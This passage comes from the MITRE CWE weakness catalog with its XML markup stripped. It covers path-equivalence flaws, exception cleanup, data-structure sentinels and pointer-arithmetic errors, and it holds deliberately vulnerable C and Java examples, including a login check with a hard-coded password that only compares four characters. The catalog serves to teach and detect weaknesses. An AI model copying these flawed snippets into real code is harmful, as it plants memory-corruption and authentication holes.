+ 2017-11-08 + updated Applicable_Platforms, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product accepts path input in the form of trailing space ('filedir ') without appropriate validation, which can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files. + + + + + + + + + + + Implementation + + + + + Confidentiality + Integrity + Read Files or Directories + Modify Files or Directories + + + + + CVE-2001-0693 + Source disclosure via trailing encoded space "%20" + https://www.cve.org/CVERecord?id=CVE-2001-0693 + + + CVE-2001-0778 + Source disclosure via trailing encoded space "%20" + https://www.cve.org/CVERecord?id=CVE-2001-0778 + + + CVE-2001-1248 + Source disclosure via trailing encoded space "%20" + https://www.cve.org/CVERecord?id=CVE-2001-1248 + + + CVE-2004-0280 + Source disclosure via trailing encoded space "%20" + https://www.cve.org/CVERecord?id=CVE-2004-0280 + + + CVE-2004-2213 + Source disclosure via trailing encoded space "%20" + https://www.cve.org/CVERecord?id=CVE-2004-2213 + + + CVE-2005-0622 + Source disclosure via trailing encoded space "%20" + https://www.cve.org/CVERecord?id=CVE-2005-0622 + + + CVE-2005-1656 + Source disclosure via trailing encoded space "%20" + https://www.cve.org/CVERecord?id=CVE-2005-1656 + + + CVE-2002-1603 + Source disclosure via trailing encoded space "%20" + https://www.cve.org/CVERecord?id=CVE-2002-1603 + + + CVE-2001-0054 + Multi-Factor Vulnerability (MVF). directory traversal and other issues in FTP server using Web encodings such as "%20"; certain manipulations have unusual side effects. + https://www.cve.org/CVERecord?id=CVE-2001-0054 + + + CVE-2002-1451 + Trailing space ("+" in query string) leads to source code disclosure. + https://www.cve.org/CVERecord?id=CVE-2002-1451 + + + + + Trailing Space - 'filedir ' + + + SFP16 + Path Traversal + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2019-06-20 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Path Issue - Trailing Space - 'filedir ' + + + + The product does not clean up its state or incorrectly cleans up its state when an exception is thrown, leading to unexpected state or control flow. + Often, when functions or loops become complicated, some level of resource cleanup is needed throughout execution. Exceptions can disturb the flow of the code and prevent the necessary cleanup from happening. + + + + + + + + + + + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + Medium + + + Other + Varies by Context + The code could be left in a bad state. + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Implementation + If one breaks from a loop or function by throwing an exception, make sure that cleanup happens or that you should exit the program. Use throwing exceptions sparsely. + + + + + The following example demonstrates the weakness. + + public class foo { + public static final void main( String args[] ) { + + boolean returnValue;returnValue=doStuff(); + }public static final boolean doStuff( ) { + + boolean threadLock;boolean truthvalue=true;try { + + while( + //check some condition + ) { + + threadLock=true; //do some stuff to truthvaluethreadLock=false; + } + }catch (Exception e){ + + System.err.println("You did something bad");if (something) return truthvalue; + }return truthvalue; + } + } + + In this case, you may leave a thread locked accidentally. + + + + + Improper cleanup on thrown exception + + + ERR03-J + Restore prior object state on method failure + + + ERR05-J + Do not let checked exceptions escape from a finally block + + + EXP31-PL + Do not suppress or ignore exceptions + Imprecise + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CLASP + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Applicable_Platforms, Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-03-10 + updated Relationships + + + CWE Content Team + MITRE + 2009-05-27 + updated Description + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-09-13 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2014-06-23 + updated Description, Other_Notes + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Demonstrative_Examples, Modes_of_Introduction, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated References, Type + + + CWE Content Team + MITRE + 2021-03-15 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Duplicate keys in associative lists can lead to non-unique keys being mistaken for an error. + A duplicate key entry -- if the alist is designed properly -- could be used as a constant time replace function. However, duplicate key entries could be inserted by mistake. Because of this ambiguity, duplicate key entries in an association list are not recommended and should not be allowed. + + + + + + + + + + + + Implementation + + + Low + + + Other + Quality Degradation + Varies by Context + + + + + Architecture and Design + Use a hash table instead of an alist. + + + Architecture and Design + Use an alist which checks the uniqueness of hash keys with each entry before inserting the entry. + + + + + The following code adds data to a list and then attempts to sort the data. + + alist = []while (foo()): #now assume there is a string data with a key basenamequeue.append(basename,data)queue.sort() + + + Since basename is not necessarily unique, this may not sort how one would like it to be. + + + + + Duplicate key in associative list (alist) + + + ENV02-C + Beware of multiple environment variables with the same effective name + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CLASP + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Applicable_Platforms, Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-11-24 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-10-29 + updated Demonstrative_Examples, Description, Other_Notes + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-09-13 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships, Time_of_Introduction, Type + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The accidental deletion of a data-structure sentinel can cause serious programming logic problems. + Often times data-structure sentinels are used to mark structure of the data structure. A common example of this is the null character at the end of strings. Another common example is linked lists which may contain a sentinel to mark the end of the list. It is dangerous to allow this type of control data to be easily accessible. Therefore, it is important to protect from the deletion or modification outside of some wrapper interface which provides safety. + + + + + + + + + + + Implementation + + + + + Availability + Other + Other + Generally this error will cause the data structure to not work properly. + + + Authorization + Other + Other + If a control character, such as NULL is removed, one may cause resource access control problems. + + + + + Architecture and Design + Use an abstraction library to abstract away risky APIs. Not a complete solution. + + + Build and Compilation + Compilation or Build Hardening + + Run or compile the software using features or extensions that automatically provide a protection mechanism that mitigates or eliminates buffer overflows. + For example, certain compilers and extensions provide automatic buffer overflow detection mechanisms that are built into the compiled code. Examples include the Microsoft Visual Studio /GS flag, Fedora/Red Hat FORTIFY_SOURCE GCC flag, StackGuard, and ProPolice. + + Defense in Depth + This is not necessarily a complete solution, since these mechanisms can only detect certain types of overflows. In addition, an attack could still cause a denial of service, since the typical response is to exit the application. + + + Operation + Use OS-level preventative functionality. Not a complete solution. + + + + + This example creates a null terminated string and prints it contents. + + char *foo;int counter;foo=calloc(sizeof(char)*10); + for (counter=0;counter!=10;counter++) {foo[counter]='a'; + printf("%s\n",foo);} + + The string foo has space for 9 characters and a null terminator, but 10 characters are written to it. As a result, the string foo is not null terminated and calling printf() on it will have unpredictable and possibly dangerous results. + + + + + Deletion of data-structure sentinel + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CLASP + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Applicable_Platforms, Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-07-27 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2009-10-29 + updated Description, Other_Notes + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Demonstrative_Examples + + + CWE Content Team + MITRE + 2012-05-11 + updated References, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2020-02-24 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Deletion of Data-structure Sentinel + + + + The accidental addition of a data-structure sentinel can cause serious programming logic problems. + Data-structure sentinels are often used to mark the structure of data. A common example of this is the null character at the end of strings or a special sentinel to mark the end of a linked list. It is dangerous to allow this type of control data to be easily accessible. Therefore, it is important to protect from the addition or modification of sentinels. + + + + + + + + + + Implementation + + + High + + + Integrity + Modify Application Data + Generally this error will cause the data structure to not work properly by truncating the data. + + + + + Implementation + Architecture and Design + Encapsulate the user from interacting with data sentinels. Validate user input to verify that sentinels are not present. + + + Implementation + Proper error checking can reduce the risk of inadvertently introducing sentinel values into data. For example, if a parsing function fails or encounters an error, it might return a value that is the same as the sentinel. + + + Architecture and Design + Use an abstraction library to abstract away risky APIs. This is not a complete solution. + + + Operation + Use OS-level preventative functionality. This is not a complete solution. + + + + + The following example assigns some character values to a list of characters and prints them each individually, and then as a string. The third character value is intended to be an integer taken from user input and converted to an int. + + char *foo;foo=malloc(sizeof(char)*5);foo[0]='a';foo[1]='a';foo[2]=atoi(getc(stdin));foo[3]='c';foo[4]='\0'printf("%c %c %c %c %c \n",foo[0],foo[1],foo[2],foo[3],foo[4]);printf("%s\n",foo); + + The first print statement will print each character separated by a space. However, if a non-integer is read from stdin by getc, then atoi will not make a conversion and return 0. When foo is printed as a string, the 0 at character foo[2] will act as a NULL terminator and foo[3] will never be printed. + + + + + Addition of data-structure sentinel + + + STR03-C + Do not inadvertently truncate a null-terminated byte string + + + STR06-C + Do not assume that strtok() leaves the parse string unchanged + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CLASP + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Applicable_Platforms, Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-11-24 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-07-27 + updated Demonstrative_Examples, Description, Other_Notes, Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-09-13 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Demonstrative_Examples, Likelihood_of_Exploit, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Addition of Data-structure Sentinel + + + + A function can return a pointer to memory that is outside of the buffer that the pointer is expected to reference. + + + + + + + + + + + Implementation + + + + + Confidentiality + Integrity + Read Memory + Modify Memory + + + + + Illegal Pointer Value + + + SFP1 + Glitch in computation + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + This entry should have a chaining relationship with CWE-119 instead of a parent / child relationship, however the focus of this weakness does not map cleanly to any existing entries in CWE. A new parent is being considered which covers the more generic problem of incorrect return values. There is also an abstract relationship to weaknesses in which one component sends incorrect messages to another component; in this case, one routine is sending an incorrect value to another. + + + + 7 Pernicious Kingdoms + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + KDM Analytics + 2008-08-01 + added/updated white box definitions + + + CWE Content Team + MITRE + 2008-09-08 + updated Applicable_Platforms, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-11-24 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-10-29 + updated Maintenance_Notes + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-09-13 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Potential_Mitigations, References, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Taxonomy_Mappings, White_Box_Definitions + + + CWE Content Team + MITRE + 2020-02-24 + updated References + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Illegal Pointer Value + + + + The code calls sizeof() on a malloced pointer type, which always returns the wordsize/8. This can produce an unexpected result if the programmer intended to determine how much memory has been allocated. + The use of sizeof() on a pointer can sometimes generate useful information. An obvious case is to find out the wordsize on a platform. More often than not, the appearance of sizeof(pointer) indicates a bug. + + + + + + Primary + + + + + + + + + Implementation + + + High + + + Integrity + Confidentiality + Modify Memory + Read Memory + This error can often cause one to allocate a buffer that is much smaller than what is needed, leading to resultant weaknesses such as buffer overflows. + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Implementation + Use expressions such as "sizeof(*pointer)" instead of "sizeof(pointer)", unless you intend to run sizeof() on a pointer type to gain some platform independence or if you are allocating a variable on the stack. + + + + + Care should be taken to ensure sizeof returns the size of the data structure itself, and not the size of the pointer to the data structure. + In this example, sizeof(foo) returns the size of the pointer. + + double *foo;...foo = (double *)malloc(sizeof(foo)); + + In this example, sizeof(*foo) returns the size of the data structure and not the size of the pointer. + + double *foo;...foo = (double *)malloc(sizeof(*foo)); + + + + This example defines a fixed username and password. The AuthenticateUser() function is intended to accept a username and a password from an untrusted user, and check to ensure that it matches the username and password. If the username and password match, AuthenticateUser() is intended to indicate that authentication succeeded. + + + + /* Ignore CWE-259 (hard-coded password) and CWE-309 (use of password system for authentication) for this example. */ + + char *username = "admin";char *pass = "password"; + int AuthenticateUser(char *inUser, char *inPass) { + printf("Sizeof username = %d\n", sizeof(username));printf("Sizeof pass = %d\n", sizeof(pass)); + if (strncmp(username, inUser, sizeof(username))) {printf("Auth failure of username using sizeof\n");return(AUTH_FAIL);} + /* Because of CWE-467, the sizeof returns 4 on many platforms and architectures. */ + + if (! strncmp(pass, inPass, sizeof(pass))) {printf("Auth success of password using sizeof\n");return(AUTH_SUCCESS);}else {printf("Auth fail of password using sizeof\n");return(AUTH_FAIL);} + } + int main (int argc, char **argv){ + int authResult; + if (argc < 3) {ExitError("Usage: Provide a username and password");}authResult = AuthenticateUser(argv[1], argv[2]);if (authResult != AUTH_SUCCESS) {ExitError("Authentication failed");}else {DoAuthenticatedTask(argv[1]);} + } + + In AuthenticateUser(), because sizeof() is applied to a parameter with an array type, the sizeof() call might return 4 on many modern architectures. As a result, the strncmp() call only checks the first four characters of the input password, resulting in a partial comparison (CWE-187), leading to improper authentication (CWE-287). + Because of the partial comparison, any of these passwords would still cause authentication to succeed for the "admin" user: + + pass5passABCDEFGHpassWORD + + Because only 4 characters are checked, this significantly reduces the search space for an attacker, making brute force attacks more feasible. + The same problem also applies to the username, so values such as "adminXYZ" and "administrator" will succeed for the username. + + + + + Use of sizeof() on a pointer type + + + ARR01-C + Do not apply the sizeof operator to a pointer when taking the size of an array + + + MEM35-C + Allocate sufficient memory for an object + CWE More Abstract + + + SFP10 + Incorrect Buffer Length Computation + + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CLASP + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + KDM Analytics + 2008-08-01 + added/updated white box definitions + + + CWE Content Team + MITRE + 2008-09-08 + updated Applicable_Platforms, Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2008-11-24 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-03-10 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2009-12-28 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2010-02-16 + updated Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-09-13 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2014-06-23 + updated Description, Other_Notes + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Demonstrative_Examples, Taxonomy_Mappings, White_Box_Definitions + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated References + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + In C and C++, one may often accidentally refer to the wrong memory due to the semantics of when math operations are implicitly scaled. + + + + + + + + + + Implementation + Programmers may try to index from a pointer by adding a number of bytes. This is incorrect because C and C++ implicitly scale the operand by the size of the data type. + + + Medium + + + Confidentiality + Integrity + Read Memory + Modify Memory + Incorrect pointer scaling will often result in buffer overflow conditions. Confidentiality can be compromised if the weakness is in the context of a buffer over-read or under-read. + + + + + Architecture and Design + Use a platform with high-level memory abstractions. + + + Implementation + Always use array indexing instead of direct pointer manipulation. + + + Architecture and Design + Use technologies for preventing buffer overflows. + + + + + This example attempts to calculate the position of the second byte of a pointer. + + int *p = x;char * second_char = (char *)(p + 1); + + In this example, second_char is intended to point to the second byte of p. But, adding 1 to p actually adds sizeof(int) to p, giving a result that is incorrect (3 bytes off on 32-bit platforms). If the resulting memory address is read, this could potentially be an information leak. If it is a write, it could be a security-critical write to unauthorized memory-- whether or not it is a buffer overflow. Note that the above code may also be wrong in other ways, particularly in a little endian environment. + + + + + Unintentional pointer scaling + + + ARR39-C + Do not add or subtract a scaled integer to a pointer + Exact + + + EXP08-C + Ensure pointer arithmetic is used correctly + + + SFP1 + Glitch in computation + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CLASP + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + KDM Analytics + 2008-08-01 + added/updated white box definitions + + + CWE Content Team + MITRE + 2008-09-08 + updated Applicable_Platforms, Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-11-24 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-05-27 + updated Demonstrative_Examples + + + KDM Analytics + 2009-07-17 + Improved the White_Box_Definition + + + CWE Content Team + MITRE + 2009-07-27 + updated White_Box_Definitions + + + CWE Content Team + MITRE + 2009-10-29 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Demonstrative_Examples, References, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-06-23 + updated Modes_of_Introduction, Other_Notes + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Relationships, Taxonomy_Mappings, White_Box_Definitions + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated References + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Unintentional Pointer Scaling + + + + The product subtracts one pointer from another in order to determine size, but this calculation can be incorrect if the pointers do not exist in the same memory chunk. + + + + + + + + + + Implementation + + + Medium + + + Access Control + Integrity + Confidentiality + Availability + Modify Memory + Read Memory + Execute Unauthorized Code or Commands + Gain Privileges or Assume Identity + There is the potential for arbitrary code execution with privileges of the vulnerable program. + + + + + Fuzzing + Fuzz testing (fuzzing) is a powerful technique for generating large numbers of diverse inputs - either randomly or algorithmically - and dynamically invoking the code with those inputs. Even with random inputs, it is often capable of generating unexpected results such as crashes, memory corruption, or resource consumption. Fuzzing effectively produces repeatable test cases that clearly indicate bugs, which helps developers to diagnose the issues. + High + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Implementation + Save an index variable. This is the recommended solution. Rather than subtract pointers from one another, use an index variable of the same size as the pointers in question. Use this variable to "walk" from one pointer to the other and calculate the difference. Always validate this number. + + + + + The following example contains the method size that is used to determine the number of nodes in a linked list. The method is passed a pointer to the head of the linked list. + + struct node {int data;struct node* next;}; + + // Returns the number of nodes in a linked list from + + + // the given pointer to the head of the list. + int size(struct node* head) {struct node* current = head;struct node* tail;while (current != NULL) {tail = current;current = current->next;}return tail - head;} + + // other methods for manipulating the list + ... + + + However, the method creates a pointer that points to the end of the list and uses pointer subtraction to determine the number of nodes in the list by subtracting the tail pointer from the head pointer. There no guarantee that the pointers exist in the same memory area, therefore using pointer subtraction in this way could return incorrect results and allow other unintended behavior. In this example a counter should be used to determine the number of nodes in the list, as shown in the following code. + + + ... + int size(struct node* head) {struct node* current = head;int count = 0;while (current != NULL) {count++;current = current->next;}return count;} + + + + + + Improper pointer subtraction + + + ARR36-C + Do not subtract or compare two pointers that do not refer to the same array + Exact + + + SFP7 + Faulty Pointer Use + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CLASP + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + KDM Analytics + 2008-08-01 + added/updated white box definitions + + + CWE Content Team + MITRE + 2008-09-08 + updated Applicable_Platforms, Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-11-24 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-09-13 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Demonstrative_Examples, Potential_Mitigations + + + CWE Content Team + MITRE + 2014-02-18 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-06-23 + updated Other_Notes + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Demonstrative_Examples, Taxonomy_Mappings, White_Box_Definitions + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated References, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-06-25 + updated Common_Consequences + + + CWE Content Team + MITRE + 2021-03-15 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2022-10-13 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Improper Pointer Subtraction + + + + The product accepts path input in the form of leading space (' filedir') without appropriate validation, which can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files. + + + + + + + + + Implementation + + + + + Confidentiality + Integrity + Read Files or Directories + Modify Files or Directories + + + + + Leading Space - ' filedir' + + + SFP16 + Path Traversal + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Path Issue - Leading Space - ' filedir' + Path Equivalence: ' filename (Leading Space) + + + + The product uses external input with reflection to select which classes or code to use, but it does not sufficiently prevent the input from selecting improper classes or code. + If the product uses external inputs to determine which class to instantiate or which method to invoke, then an attacker could supply values to select unexpected classes or methods. If this occurs, then the attacker could create control flow paths that were not intended by the developer. These paths could bypass authentication or access control checks, or otherwise cause the product to behave in an unexpected manner. This situation becomes a doomsday scenario if the attacker can upload files into a location that appears on the product's 